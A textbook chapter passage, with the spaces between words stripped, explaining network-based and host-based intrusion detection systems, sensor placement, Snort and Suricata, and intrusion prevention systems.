Network-BasedIDSsNetwork-basedIDSs(NIDSs)actuallycamealongafewyearsafterhost-basedsystems.Afterrunninghost-basedsystemsforawhile,manyorganizationsgrewtiredofthetime,energy,andexpenseinvolvedwithmanagingthefirstgenerationofthesesystems—thehost-basedsystemswerenotcentrallymanaged,therewasnoeasywaytocorrelatealertsbetweensystems,andfalse-positiverateswerehigh.Thedesirefora“betterway”grewalongwiththeamountofinterconnectivitybetweensystemsand,consequently,theamountofmaliciousactivitycomingacrossthenetworksthemselves.ThisfueleddevelopmentofanewbreedofIDSdesignedtofocusonthesourceforagreatdealofthemalicioustraffic—thenetworkitself.
TechTip
NetworkVisibilityAnetworkIDShastobeabletoseetraffictofindthemalicioustraffic.EncryptedtrafficsuchasSSHorHTTPSsessionsmustbedecryptedbeforeanetworkIDScanexaminethem.
TheNIDSintegratedverywellintotheconceptofperimetersecurity.Moreandmorecompaniesbegantooperatetheircomputersecuritylikeacastleormilitarybase(seeFigure13.3),withattentionandeffortfocusedonsecuringandcontrollingthewaysinandout—theideabeingthatifyoucouldrestrictandcontrolaccessattheperimeter,youdidn’thavetoworryasmuchaboutactivityinsidetheorganization.Eventhoughtheideaofasecurityperimeterissomewhatflawed(manysecurityincidentsoriginateinsidetheperimeter),itcaughtonveryquickly,asitwaseasytounderstandanddevicessuchasfirewalls,bastionhosts,androuterswere
availabletodefineandsecurethatperimeter.Thebestwaytosecuretheperimeterfromoutsideattackistorejectalltrafficfromexternalentities,butthisisimpossibleandimpracticaltodo,sosecuritypersonnelneededawaytolettrafficinbutstillbeabletodeterminewhetherornotthetrafficwasmalicious.ThisistheproblemthatNIDSdevelopersweretryingtosolve.
•Figure13.3Networkperimetersarealittlelikecastles—firewallsandNIDSsformthegatesandguardstokeepmalicioustrafficout.
Asitsnamesuggests,aNIDSfocusesonnetworktraffic—thebitsandbytestravelingalongthecablesandwiresthatinterconnectthesystems.ANIDSmustexaminethenetworktrafficasitpassesbyandbeabletoanalyzetrafficaccordingtoprotocol,type,amount,source,destination,content,trafficalreadyseen,andotherfactors.Thisanalysismusthappenquickly,andtheNIDSmustbeabletohandletrafficatwhateverspeedthenetworkoperatestobeeffective.NIDSsaretypicallydeployedsothattheycanmonitortrafficinandout
ofanorganization’smajorlinks:connectionstotheInternet,remoteoffices,partners,andsoon.Likehost-basedsystems,NIDSslookforcertainactivitiesthattypifyhostileactionsormisuse,suchasthefollowing:
Denial-of-serviceattacks
Portscansorsweeps
Maliciouscontentinthedatapayloadofapacketorpackets
Vulnerabilityscanning
Trojans,viruses,orworms
Tunneling
Brute-forceattacks
Ingeneral,mostNIDSsoperateinafairlysimilarfashion.Figure13.4showsthelogicallayoutofaNIDS.Byconsideringthefunctionandactivityofeachcomponent,youcangainsomeinsightintohowaNIDSoperates.
•Figure13.4NetworkIDScomponents
Inthesimplestform,aNIDShasthesamemajorcomponents:trafficcollector,analysisengine,reports,andauserinterface.InaNIDS,thetrafficcollectorisspecificallydesignedtopulltraffic
fromthenetwork.Thiscomponentusuallybehavesinmuchthesamewayasanetworktrafficsniffer—itsimplypullseverypacketitcanseeoffthenetworktowhichitisconnected.InaNIDS,thetrafficcollectorwilllogicallyattachitselftoanetworkinterfacecard(NIC)andinstructtheNICtoaccepteverypacketitcan.ANICthatacceptsandprocesseseverypacketregardlessofthepacket’soriginanddestinationissaidtobeinpromiscuousmode.
TechTip
AnotherWaytoLookatNIDSsInitssimplestform,aNIDSisalotlikeamotiondetectorandavideosurveillancesystemrolledintoone.TheNIDSnotestheundesirableactivity,generatesanalarm,andrecordswhathappens.
TheanalysisengineinaNIDSservesthesamefunctionasitshost-basedcounterpart,withsomesubstantialdifferences.Thenetworkanalysisenginemustbeabletocollectpacketsandexaminethemindividuallyor,ifnecessary,reassemblethemintoanentiretrafficsession.Thepatternsandsignaturesbeingmatchedarefarmorecomplicatedthanhost-basedsignatures,sotheanalysisenginemustbeabletorememberwhattrafficprecededthetrafficcurrentlybeinganalyzedsothatitcandeterminewhetherornotthattrafficfitsintoalargerpatternofmaliciousactivity.Additionally,thenetwork-basedanalysisenginemustbeabletokeepupwiththeflowoftrafficonthenetwork,rebuildingnetworksessionsandmatchingpatternsinrealtime.
CrossCheck
NIDSandEncryptedTrafficYoulearnedaboutencryptedtrafficinChapter5,socheckyourmemorywiththesequestions.WhatisSSH?Whatisaone-timepad?Canyounameatleastthreedifferentalgorithms?
TheNIDSsignaturedatabaseisusuallymuchlargerthanthatofahost-basedsystem.Whenexaminingnetworkpatterns,theNIDSmustbeabletorecognizetraffictargetedatmanydifferentapplicationsandoperatingsystemsaswellastrafficfromawidevarietyofthreats(worms,assessmenttools,attacktools,andsoon).Someofthesignaturesthemselvescanbequitelarge,astheNIDSmustlookatnetworktraffic
occurringinaspecificorderoveraperiodoftimetomatchaparticularmaliciouspattern.Usingthelessonslearnedfromearlyhost-basedsystems,NIDS
developersmodifiedthelogicalcomponentdesignsomewhattodistributetheuserinterfaceandreportingfunctions.Asmanycompanieshadmorethanonenetworklink,theywouldneedanIDScapableofhandlingmultiplelinksinmanydifferentlocations.TheearlyIDSvendorssolvedthisdilemmabydividingthecomponentsandassigningthemtoseparateentities.Thetrafficcollector,analysisengine,andsignaturedatabasewerebundledintoasingleentity,usuallycalledasensororappliance.Thesensorswouldreporttoandbecontrolledbyacentralsystemormasterconsole.Thiscentralsystem,showninFigure13.5,consolidatedalarmsandprovidedtheuserinterfaceandreportingfunctionsthatallowedusersinonelocationtomanage,maintain,andmonitorsensorsdeployedinavarietyofremotelocations.
•Figure13.5DistributednetworkIDScomponents
Bycreatingseparatecomponentsdesignedtoworktogether,theNIDSdeveloperswereabletobuildamorecapableandflexiblesystem.Withencryptedcommunications,networksensorscouldbeplacedaroundbothlocalandremoteperimetersandstillbemonitoredandmanagedsecurelyfromacentrallocation.Placementofthesensorsveryquicklybecameanissueformostsecuritypersonnel,asthesensorsobviouslyhadtohavevisibilityofthenetworktrafficinordertoanalyzeit.BecausemostorganizationswithNIDSsalsohadfirewalls,locationoftheNIDSrelativetothefirewallhadtobeconsideredaswell.Placedbeforethefirewall,asshowninFigure13.6,theNIDSwillseealltrafficcominginfromthe
Internet,includingattacksagainstthefirewallitself.Thisincludestrafficthatthefirewallstopsanddoesnotpermitintothecorporatenetwork.Withthistypeofdeployment,theNIDSsensorwillgeneratealargenumberofalarms(includingalarmsfortrafficthatthefirewallwouldstop).Thistendstooverwhelmthehumanoperatorsmanagingthesystem.
•Figure13.6NIDSsensorplacedinfrontoffirewall
Placedafterthefirewall,asshowninFigure13.7,theNIDSsensorseesandanalyzesthetrafficthatisbeingpassedthroughthefirewallandintothecorporatenetwork.WhilethisdoesnotallowtheNIDStoseeattacksagainstthefirewall,itgenerallyresultsinfarfeweralarmsandisthemostpopularplacementforNIDSsensors.
•Figure13.7NIDSsensorplacedbehindfirewall
Asyoualreadyknow,NIDSsexaminethenetworktrafficforsuspiciousormaliciousactivity.HerearetwoexamplesofsuspicioustraffictoillustratetheoperationofaNIDS:
PortscanAportscanisareconnaissanceactivityapotentialattackerusestofindoutinformationaboutthesystemshewantstoattack.Usinganyofanumberoftools,theattackerattemptstoconnecttovariousservices(web,FTP,SMTP,andsoon)toseeiftheyexistontheintendedtarget.Innormalnetworktraffic,asingleusermightconnecttotheFTPserviceprovidedonasinglesystem.Duringaportscan,anattackermayattempttoconnecttotheFTPserviceoneverysystem.Astheattacker’strafficpassesbytheIDS,theIDSwillnoticethispatternofattemptingtoconnecttodifferentservicesondifferentsystemsinarelativelyshortperiodoftime.WhentheIDScompares
theactivitytoitssignaturedatabase,itwillverylikelymatchthistrafficagainsttheportscanningsignatureandgenerateanalarm.
PingofdeathTowardtheendof1996,itwasdiscoveredthatcertainoperatingsystems,suchasWindows,couldbecrashedbysendingaverylargeInternetControlMessageProtocol(ICMP)echorequestpackettothatsystem.ThisisafairlysimpletrafficpatternforaNIDStoidentify,asitsimplyhastolookforICMPpacketsoveracertainsize.
PortscanningactivityisrampantontheInternet.MostorganizationswithNIDSseehundredsorthousandsofportscanalarmseverydayfromsourcesaroundtheworld.Someadministratorsreducethealarmlevelofportscanalarmsorignoreportscanningtrafficbecausethereissimplytoomuchtraffictotrackdownandrespondtoeachalarm.
AdvantagesofaNIDSANIDShascertainadvantagesthatmakeitagoodchoiceforcertainsituations:
ProvidingIDScoveragerequiresfewersystems.Withafewwell-placedNIDSsensors,youcanmonitorallthenetworktrafficgoinginandoutofyourorganization.Fewersensorsusuallyequatestolessoverheadandmaintenance,meaningyoucanprotectthesamenumberofsystemsatalowercost.
Deployment,maintenance,andupgradecostsareusuallylower.ThefewersystemsthathavetobemanagedandmaintainedtoprovideIDScoverage,thelowerthecosttooperatetheIDS.Upgradingandmaintainingafewsensorsisusuallymuchcheaperthanupgradingandmaintaininghundredsofhost-basedprocesses.
ANIDShasvisibilityintoallnetworktrafficandcancorrelateattacks
amongmultiplesystems.Well-placedNIDSsensorscanseethe“bigpicture”whenitcomestonetwork-basedattacks.Thenetworksensorscantellyouwhetherattacksarewidespreadandunorganizedorfocusedandconcentratedonspecificsystems.
DisadvantagesofaNIDSANIDShascertaindisadvantages:
Itisineffectivewhentrafficisencrypted.Whennetworktrafficisencryptedfromapplicationtoapplicationorsystemtosystem,aNIDSsensorwillnotbeabletoexaminethattraffic.Withtheincreasingpopularityofencryptedtraffic,thisisbecomingabiggerproblemforeffectiveIDSoperations.
Itcan’tseetrafficthatdoesnotcrossit.TheIDSsensorcanexamineonlytrafficcrossingthenetworklinkitismonitoring.WithmostIDSsensorsbeingplacedonperimeterlinks,traffictraversingtheinternalnetworkisneverseen.
Itmustbeabletohandlehighvolumesoftraffic.Asnetworkspeedscontinuetoincrease,thenetworksensorsmustbeabletokeeppaceandexaminethetrafficasquicklyasitcanpassthenetwork.WhenNIDSswereintroduced,10-Mbpsnetworkswerethenorm.Now100-Mbpsandeven1-Gbpsnetworksarecommonplace.ThisincreaseintrafficspeedsmeansIDSsensorsmustbefasterandmorepowerfulthaneverbefore.
Itdoesn’tknowaboutactivityonthehoststhemselves.NIDSsfocusonnetworktraffic.ActivitythatoccursonthehoststhemselveswillnotbeseenbyaNIDS.
TechTip
TCPResetThemostcommondefensiveabilityforanactiveNIDSistosendaTCPresetmessage.WithinTCP,theresetmessage(RST)essentiallytellsbothsidesoftheconnectiontodropthesessionandstopcommunicatingimmediately.Whilethismechanismwasoriginallydevelopedtocoversituationssuchassystemsaccidentallyreceivingcommunicationsintendedforothersystems,theresetmessageworksfairlywellforNIDSs—withoneseriousdrawback:aresetmessageaffectsonlythecurrentsession.Nothingpreventstheattackerfromcomingbackandtryingagainandagain.Despitethe“temporariness”ofthissolution,sendingaresetmessageisusuallytheonlydefensivemeasureimplementedonNIDSdeployments,asthefearofblockinglegitimatetrafficanddisruptingbusinessprocesses,evenforafewmoments,oftenoutweighstheperceivedbenefitofdiscouragingpotentialintruders.
Activevs.PassiveNIDSsMostNIDSscanbedistinguishedbyhowtheyexaminethetrafficandwhetherornottheyinteractwiththattraffic.Onapassivesystem,theNIDSsimplywatchesthetraffic,analyzesit,andgeneratesalarms.Itdoesnotinteractwiththetrafficitselfinanyway,anditdoesnotmodifythedefensivepostureofthesystemtoreacttothetraffic.ApassiveNIDSisverysimilartoasimplemotionsensor—itgeneratesanalarmwhenitmatchesapattern,muchasthemotionsensorgeneratesanalarmwhenitseesmovement.AnactiveNIDScontainsallthesamecomponentsandcapabilitiesofthepassiveNIDSwithonecriticaladdition—theactiveNIDScanreacttothetrafficitisanalyzing.Thesereactionscanrangefromsomethingsimple,suchassendingaTCPresetmessagetointerruptapotentialattackanddisconnectasession,tosomethingcomplex,suchasdynamicallymodifyingfirewallrulestorejectalltrafficfromspecificsourceIPaddressesforthenext24hours.
NIDSToolsTherearenumerousexamplesofNIDStoolsinthemarketplace,fromopensourceprojectstocommercialentries.SnorthasbeenthedefactostandardIDSenginesinceitscreationin1998.Ithasalargeuserbaseand
setthestandardformanyIDSelement,includingrulesetsandformats.SnortrulesarethelistofactivitiesthatSnortwillalertonandprovidetheflexiblepowerbehindtheIDSplatform.SnortrulesetsareupdatedbyalargeactivecommunityaswellasSourcefireVulnerabilityResearchTeam,thecompanybehindSnort.SnortVRTrulesetsareavailabletosubscribersandprovidesuchelementsassame-dayprotectionforitemssuchasMicrosoftpatchTuesdayvulnerabilities.Theserulesaremovedtotheopencommunityafter30days.AnewerentranttotheIDSmarketplaceisSuricata.Suricataisanopen
sourceIDS,begunwithgrantmoneyfromtheU.S.governmentandmaintainedbytheOpenSourceSecurityFoundation(OSIF).SuricatahasoneadvantageoverSnort:itsupportsmultithreading,whileSnortonlysupportssingle-threadedoperation.Bothofthesesystemsarehighlyflexibleandscalable,operatingonbothWindowsandLinuxplatforms.
TechTip
SnortRulesThebasicformatforSnortrulesisaruleheaderfollowedbyruleoptions.
Host-BasedIDSsTheveryfirstIDSswerehost-basedanddesignedtoexamineactivityonlyonaspecifichost.Ahost-basedIDS(HIDS)examineslogfiles,audittrails,andnetworktrafficcomingintoorleavingaspecifichost.HIDSscanoperateinrealtime,lookingforactivityasitoccurs,orinbatchmode,lookingforactivityonaperiodicbasis.Host-basedsystemsaretypicallyself-contained,butmanyofthenewercommercialproductshavebeendesignedtoreporttoandbemanagedbyacentralsystem.Host-based
systemsalsotakelocalsystemresourcestooperate.Inotherwords,aHIDSwilluseupsomeofthememoryandCPUcyclesofthesystemitisprotecting.EarlyversionsofHIDSsraninbatchmode,lookingforsuspiciousactivityonanhourlyordailybasis,andtypicallylookedonlyforspecificeventsinthesystem’slogfiles.Asprocessorspeedsincreased,laterversionsofHIDSslookedthroughthelogfilesinrealtimeandevenaddedtheabilitytoexaminethedatatrafficthehostwasgeneratingandreceiving.MostHIDSsfocusonthelogfilesoraudittrailsgeneratedbythelocal
operatingsystem.OnUNIXsystems,theexaminedlogsusuallyincludethosecreatedbysyslog,suchasmessages,kernellogs,anderrorlogs.OnWindowssystems,theexaminedlogsaretypicallythethreeeventlogs:Application,System,andSecurity.SomeHIDSscancoverspecificapplications,suchasFTPorwebservices,byexaminingthelogsproducedbythosespecificapplicationsorexaminingthetrafficfromtheservicesthemselves.Withinthelogfiles,theHIDSislookingforcertainactivitiesthattypifyhostileactionsormisuse,suchasthefollowing:
Loginsatoddhours
Loginauthenticationfailures
Additionsofnewuseraccounts
Modificationoraccessofcriticalsystemfiles
Modificationorremovalofbinaryfiles(executables)
Startingorstoppingprocesses
Privilegeescalation
Useofcertainprograms
Ingeneral,mostHIDSsoperateinaverysimilarfashion.(Figure13.8showsthelogicallayoutofaHIDS.)Byconsideringthefunctionandactivityofeachcomponent,youcangainsomeinsightintohowHIDSsoperate.
•Figure13.8Host-basedIDScomponents
AsonanyIDS,thetrafficcollectoronaHIDSpullsintheinformationtheothercomponents,suchastheanalysisengine,needtoexamine.FormostHIDSs,thetrafficcollectorpullsdatafrominformationthelocalsystemhasalreadygenerated,suchaserrormessages,logfiles,andsystemfiles.Thetrafficcollectorisresponsibleforreadingthosefiles,selectingwhichitemsareofinterest,andforwardingthemtotheanalysisengine.OnsomeHIDSs,thetrafficcollectoralsoexaminesspecificattributesofcriticalfiles,suchasfilesize,datemodified,orchecksum.
Criticalfilesarethosethatarevitaltothesystem’soperationoroverallfunctionality.Theymaybeprogram(orbinary)files,filescontaininguseraccountsandpasswords,orevenscriptstostartorstopsystemprocesses.Anyunexpectedmodificationstothesefilescouldmeanthesystemhas
beencompromisedormodifiedbyanattacker.Bymonitoringthesefiles,theHIDScanwarnusersofpotentiallymaliciousactivity.
TheanalysisengineisperhapsthemostimportantcomponentoftheHIDS,asitmustdecidewhatactivityis“okay”andwhatactivityis“bad.”Theanalysisengineisasophisticateddecisionandpattern-matchingmechanism—itlooksattheinformationprovidedbythetrafficcollectorandtriestomatchitagainstknownpatternsofactivitystoredinthesignaturedatabase.Iftheactivitymatchesaknownpattern,theanalysisenginecanreact,usuallybyissuinganalertoralarm.Ananalysisenginemayalsobecapableofrememberinghowtheactivityitislookingatrightnowcomparestotrafficithasalreadyseenormayseeinthenearfuture,sothatitcanmatchmorecomplicated,multistepmaliciousactivitypatterns.Ananalysisenginemustalsobecapableofexaminingtrafficpatternsasquicklyaspossible,asthelongerittakestomatchamaliciouspattern,thelesstimetheHIDSorhumanoperatorhastoreacttomalicioustraffic.MostHIDSvendorsbuildadecisiontreeintotheiranalysisenginestoexpeditepatternmatching.Thesignaturedatabaseisacollectionofpredefinedactivitypatterns
thathavealreadybeenidentifiedandcategorized—patternsthattypicallyindicatesuspiciousormaliciousactivity.Whentheanalysisenginehasanactivityortrafficpatterntoexamine,itcomparesthatpatterntotheappropriatesignaturesinthedatabase.Thesignaturedatabasecancontainanywherefromafewtoafewthousandsignatures,dependingonthevendor,typeofHIDS,spaceavailableonthesystemtostoresignatures,andotherfactors.TheuserinterfaceisthevisiblecomponentoftheHIDS—thepartthat
humansinteractwith.TheuserinterfacevarieswidelydependingontheproductandvendorandcouldbeanythingfromadetailedGUItoasimplecommandline.Regardlessofthetypeandcomplexity,theinterfaceisprovidedtoallowtheusertointeractwiththesystem:changingparameters,receivingalarms,tuningsignaturesandresponsepatterns,andsoon.
TechTip
DecisionTreesIncomputersystems,atreeisadatastructure,eachelementofwhichisattachedtooneormorestructuresdirectlybeneathit(theconnectionsarecalledbranches).Structuresontheendofabranchwithoutanyelementsbelowthemarecalledleaves.Treesaremostoftendrawninverted,withtherootatthetopandallsubsequentelementsbranchingdownfromtheroot.Treesinwhicheachelementhasnomorethantwoelementsbelowitarecalledbinarytrees.InIDSs,adecisiontreeisusedtohelptheanalysisenginequicklyexaminetrafficpatternsandeliminatesignaturesthatdon’tapplytotheparticulartrafficoractivitybeingexamined,sothatthefewestnumberofcomparisonsneedtobemade.Forexample,asshowninthisillustration,thedecisiontreemaycontainasectionthatdividestheactivityintooneofthreesubsectionsbasedupontheoriginoftheactivity(alogentryforaneventtakenfromthesystemlogs,afilechangeforamodificationtoacriticalfile,orauseractionforsomethingauserhasdone):
Whentheanalysisenginelooksattheactivitypatternandstartsdownthedecisiontree,itmustdecidewhichpathtofollow.Ifitisalogentry,theanalysisenginecanthenconcentrateononlythesignaturesthatapplytologentriesanditdoesnotneedtoworryaboutsignaturesthatapplytofilechangesoruseractions.Thistypeofdecisiontreeallowstheanalysisenginetofunctionmuchfaster,asitdoesnothavetocompareactivitiestoeverysignatureinthedatabase,justthesignaturesthatapplytothatparticulartypeofactivity.ItisimportanttonotethatHIDSscanlookatbothactivitiesoccurringonthehostitselfandthenetworktrafficcomingintoorleavingthehost.
TobetterunderstandhowaHIDSoperates,takealookatthefollowingexamplesfromaUNIXsystemandaWindowssystem.OnaUNIXsystem,theHIDSislikelygoingtoexamineanyofa
numberofsystemlogs—basically,largetextfilescontainingentriesaboutwhatishappeningonthesystem.Forthisexample,considerthefollowinglinesfromthe“messages”logonaRedHatsystem:
InthefirstlinebeginningJan5,youseeasessionbeingopenedbyausernamedbob.Thisusuallyindicatesthatwhoeverownstheaccountbobhasloggedintothesystem.OnthenextthreelinesbeginningJan5,youseeauthenticationfailuresasbobtriestobecomeroot—thesuperuseraccountthatcandoanythingonthesystem.Inthiscase,userbobtriesthreetimes
tobecomerootandfailsoneachtry.Thispatternofactivitycouldmeananumberofdifferentthings—bobcouldbeanadminwhohasforgottenthepasswordfortherootaccount,bobcouldbeanadminandsomeonechangedtherootpasswordwithouttellinghim,bobcouldbeauserattemptingtoguesstherootpassword,oranattackercouldhavecompromisedbob’saccountandisnowtryingtocompromisetherootaccountonthesystem.Inanycase,ourHIDSwillworkthroughitsdecisiontreetodeterminewhetheranauthenticationfailureinthemessagelogissomethingitneedstoexamine.Inthisinstance,whentheHIDSexaminestheselinesinthelog,itwillnotethefactthatthreeofthelinesinthelogmatchoneofthepatternsithasbeentoldtolookfor(asdeterminedbyinformationfromthedecisiontreeandthesignaturedatabase),anditwillreactaccordingly,usuallybygeneratinganalarmoralertofsometypethatappearsontheuserinterfaceorinane-mail,page,orotherformofmessage.
TechTip
Analyst-DrivenLogAnalysisLoganalysisistheartoftranslatingcomputer-generatedlogsintomeaningfuldata.Forexample,acomputercan’talwaystellyouifanadministrator-levelloginat3A.M.onaSaturdayisdefinitelyabadthing,butananalystcan.Humananalystscanaddvaluethroughtheinterpretationofinformationincontextwithothersourcesofinformation.
OnaWindowssystem,theHIDSwilllikelyexaminethelogsgeneratedbytheoperatingsystem.Thethreebasictypesoflogs(Application,System,andSecurity)aresimilartothelogsonaUNIXsystem,thoughtheWindowslogsarenotstoredastextfilesandtypicallyrequireautilityorapplicationtoreadthem.ThisexampleusestheSecuritylogfromaWindowsVistasystem:
InthefirstthreemainlinesoftheSecuritylog,youseeanAuditFailureentryfortheLogonprocess.Thisindicatessomeonehastriedtologintothesystemthreetimesandhasfailedeachtime(muchlikeourUNIXexample)andthensucceededonthefourthtry.Youwon’tseethenameoftheaccountuntilyouexpandthelogentrywithintheWindowsEventViewertool,butforthisexample,assumeitwastheadministratoraccount—theWindowsequivalentoftherootaccount.Hereagain,youseethreeloginfailures—iftheHIDShasbeenprogrammedtolookforfailedloginattempts,itwillgeneratealertswhenitexaminestheselogentries.
AdvantagesofHIDSsHIDSshavecertainadvantagesthatmakethemagoodchoiceforcertainsituations:
Theycanbeveryoperatingsystem–specificandhavemoredetailedsignatures.AHIDScanbeveryspecificallydesignedtorunonacertainoperatingsystemortoprotectcertainapplications.Thisnarrowfocusletsdevelopersconcentrateonthespecificthingsthataffectthespecificenvironmenttheyaretryingtoprotect.Withthistypeoffocus,thedeveloperscanavoidgenericalarmsanddevelopmuchmorespecific,detailedsignaturestoidentifymalicioustrafficmore
accurately.Theycanreducefalse-positiverates.Whenrunningonaspecificsystem,theHIDSprocessismuchmorelikelytobeabletodeterminewhetherornottheactivitybeingexaminedismalicious.Bymoreaccuratelyidentifyingwhichactivityis“bad,”theHIDSwillgeneratefewerfalsepositives(alarmsgeneratedwhenthetrafficmatchesapatternbutisnotactuallymalicious).
Theycanexaminedataafterithasbeendecrypted.Withsecurityconcernsconstantlyontherise,manydevelopersarestartingtoencrypttheirnetworkcommunications.Whendesignedandimplementedintherightmanner,aHIDSwillbeabletoexaminetrafficthatisunreadabletoanetwork-basedIDS.Thisparticularabilityisbecomingmoreimportanteachdayasmoreandmorewebsitesstarttoencryptalloftheirtraffic.
Theycanbeveryapplicationspecific.Onahostlevel,theIDScanbedesigned,modified,ortunedtoworkverywellonspecificapplicationswithouthavingtoanalyzeorevenholdsignaturesforotherapplicationsthatarenotrunningonthatparticularsystem.Signaturescanbebuiltforspecificversionsofwebserversoftware,FTPservers,mailservers,oranyotherapplicationhousedonthathost.
Theycandeterminewhetherornotanalarmmayimpactthatspecificsystem.Theabilitytodeterminewhetherornotaparticularactivityorpatternwillreallyaffectthesystembeingprotectedassistsgreatlyinreducingthenumberofgeneratedalarms.BecausetheHIDSresidesonthesystem,itcanverifythingssuchaspatchlevels,presenceofcertainfiles,andsystemstatewhenitanalyzestraffic.Byknowingwhatstatethesystemisin,theHIDScanmoreaccuratelydeterminewhetheranactivityispotentiallyharmfultothesystem.
DisadvantagesofHIDSs
HIDSsalsohavecertaindisadvantagesthatmustbeweighedinmakingthedecisionofwhethertodeploythistypeoftechnology:
TheHIDSmusthaveaprocessoneverysystemyouwanttowatch.YoumusthaveaHIDSprocessorapplicationinstalledoneveryhostyouwanttowatch.Towatch100systems,then,youwouldneedtodeploy100HIDSs,orremoteagents.
TheHIDScanhaveahighcostofownershipandmaintenance.Dependingonthespecificvendorandapplication,aHIDScanbefairlycostlyintermsoftimeandmanpowertomaintain.Unlesssometypeofcentralconsoleisusedthatallowsyoutomaintainremoteprocesses,administratorsmustmaintaineachHIDSprocessindividually.Evenwithacentralconsole,withaHIDS,therewillbeahighnumberofprocessestomaintain,softwaretoupdate,andparameterstotune.
TheHIDSuseslocalsystemresources.Tofunction,theHIDSmustuseCPUcyclesandmemoryfromthesystemitistryingtoprotect.WhateverresourcestheHIDSusesarenolongeravailableforthesystemtoperformitsotherfunctions.Thisbecomesextremelyimportantonapplicationssuchashigh-volumewebservers,wherefewerresourcesusuallymeansfewervisitorsservedandtheneedformoresystemstohandleexpectedtraffic.
TheHIDShasaveryfocusedviewandcannotrelatetoactivityaroundit.TheHIDShasalimitedviewoftheworld,asitcanseeactivityonlyonthehostitisprotecting.Ithaslittletonovisibilityintotrafficarounditonthenetworkoreventstakingplaceonotherhosts.Consequently,aHIDScantellyouonlyifthesystemitisrunningonisunderattack.
TheHIDS,ifloggingonlylocally,couldbecompromisedordisabled.WhenaHIDSgeneratesalarms,ittypicallystoresthealarminformationinafileordatabaseofsomesort.IftheHIDSstoresitsgeneratedalarmtrafficonthelocalsystem,anattackerthatis
successfulinbreakingintothesystemmaybeabletomodifyordeletethosealarms.Thismakesitdifficultforsecuritypersonneltodiscovertheintruderandconductanytypeofpost-incidentinvestigation.AcapableintrudermayevenbeabletoturnofftheHIDSprocesscompletely.
Asecuritybestpracticeistostoreormakeacopyofloginformation,especiallysecurity-relatedloginformation,onaseparatesystem.Whenasystemiscompromised,theattackertypicallyhidestheirtracksbyclearingoutanylogfilesonthecompromisedsystem.Ifthelogfilesareonlystoredlocallyonthecompromisedsystem,you’llknowanattackerwaspresent(duetotheemptylogfiles)butyouwon’tknowwhattheydidorwhentheydidit.
Activevs.PassiveHIDSsMostIDSscanbedistinguishedbyhowtheyexaminetheactivityaroundthemandwhetherornottheyinteractwiththatactivity.ThisiscertainlytrueforHIDSs.Onapassivesystem,theHIDSisexactlythat—itsimplywatchestheactivity,analyzesit,andgeneratesalarms.Itdoesnotinteractwiththeactivityitselfinanyway,anditdoesnotmodifythedefensivepostureofthesystemtoreacttothetraffic.ApassiveHIDSissimilartoasimplemotionsensor—itgeneratesanalarmwhenitmatchesapattern,muchasthemotionsensorgeneratesanalarmwhenitseesmovement.AnactiveIDSwillcontainallthesamecomponentsandcapabilitiesof
thepassiveIDSwithonecriticalexception—theactiveIDScanreacttotheactivityitisanalyzing.Thesereactionscanrangefromsomethingsimple,suchasrunningascripttoturnaprocessonoroff,tosomethingascomplexasmodifyingfilepermissions,terminatingtheoffendingprocesses,loggingoffspecificusers,andreconfiguringlocalcapabilitiestopreventspecificusersfromlogginginforthenext12hours.
ResurgenceandAdvancementofHIDSs
ThepastfewyearshaveseenastrongresurgenceintheuseofHIDSs.Withthegreatadvancesinprocessorpower,theintroductionofmulticoreprocessors,andtheincreasedcapacityofharddrivesandmemorysystems,someofthetraditionalbarrierstorunningaHIDShavebeenovercome.Combinethoseadvancesintechnologywiththewidespreadadoptionofalways-onbroadbandconnections,theriseintheuseoftelecommuting,andagreateroverallawarenessoftheneedforcomputersecurity,andsolutionssuchasHIDSsstarttobecomeanattractiveandsometimeseffectivesolutionforbusinessandhomeusersalike.ThelatestgenerationofHIDSshasintroducednewcapabilitiesdesigned
tostopattacksbypreventingthemfromeverexecutingoraccessingprotectedfilesinthefirstplace,ratherthanrelyingonaspecificsignaturesetthatonlymatchesknownattacks.Themoreadvancedhost-basedofferings,whichmostvendorsrefertoashost-basedintrusionpreventionsystems(HIPSs),combinethefollowingelementsintoasinglepackage:
IntegratedsystemfirewallThefirewallcomponentchecksallnetworktrafficpassingintoandoutofthehost.Userscansetrulesforwhattypesoftraffictheywanttoallowintooroutoftheirsystem.
Behavioral-andsignature-basedIDSThishybridapproachusessignaturestomatchwell-knownattacksandgenericpatternsforcatching“zero-day”orunknownattacksforwhichnosignaturesexist.
ApplicationcontrolThisallowsadministratorstocontrolhowapplicationsareusedonthesystemandwhetherornotnewapplicationscanbeinstalled.Controllingtheaddition,deletion,ormodificationofexistingsoftwarecanbeagoodwaytocontrolasystem’sbaselineandpreventmalwarefrombeinginstalled.
EnterprisemanagementSomehost-basedproductsareinstalledwithan“agent”thatallowsthemtobemanagedbyandreportbacktoacentralserver.Thistypeofintegratedremotemanagementcapabilityisessentialinanylarge-scaledeploymentofhost-basedIDS/IPS.
MalwaredetectionandpreventionSomeHIDSs/HIPSsinclude
scanningandpreventioncapabilitiesthataddressspyware,malware,rootkits,andothermalicioussoftware.
Integratedsecurityproductscanprovideagreatdealofsecurity-relatedfeaturesinasinglepackage.Thisisoftencheaperandmoreconvenientthanpurchasingaseparateantivirusproduct,afirewall,andanIDS.However,integratedproductsarenotwithoutpotentialpitfalls—ifoneportionoftheintegratedproductfails,theentireprotectivesuitemayfail.Symantec’sEndpointProtectionandMcAfee’sInternetSecurityareexamplesofintegrated,host-basedprotectionproducts.
IntrusionPreventionSystemsAnintrusionpreventionsystem(IPS)monitorsnetworktrafficformaliciousorunwantedbehaviorandcanblock,reject,orredirectthattrafficinrealtime.Soundfamiliar?Itshould:whilemanyvendorswillarguethatanIPSisadifferentanimalfromanIDS,thetruthisthatmostIPSsaremerelyexpansionsofexistingIDScapabilities.Asacorefunction,anIPSmustbeabletomonitorforanddetectpotentiallymaliciousnetworktraffic,whichisessentiallythesamefunctionasanIDS.However,anIPSdoesnotstopatmerelymonitoringtraffic—itmustbeabletoblock,reject,orredirectthattrafficinrealtimetobeconsideredatrueIPS.Itmustbeabletostoporpreventmalicioustrafficfromhavinganimpact.ToqualifyasanIDS,asystemjustneedstoseeandclassifythetrafficasmalicious.ToqualifyasanIPS,asystemmustbeabletodosomethingaboutthattraffic.Inreality,mostproductsthatarecalledIDSs,includingthefirstcommerciallyavailableIDS,NetRanger,caninteractwithandstopmalicioustraffic,sothedistinctionbetweenthetwoisoftenblurred.
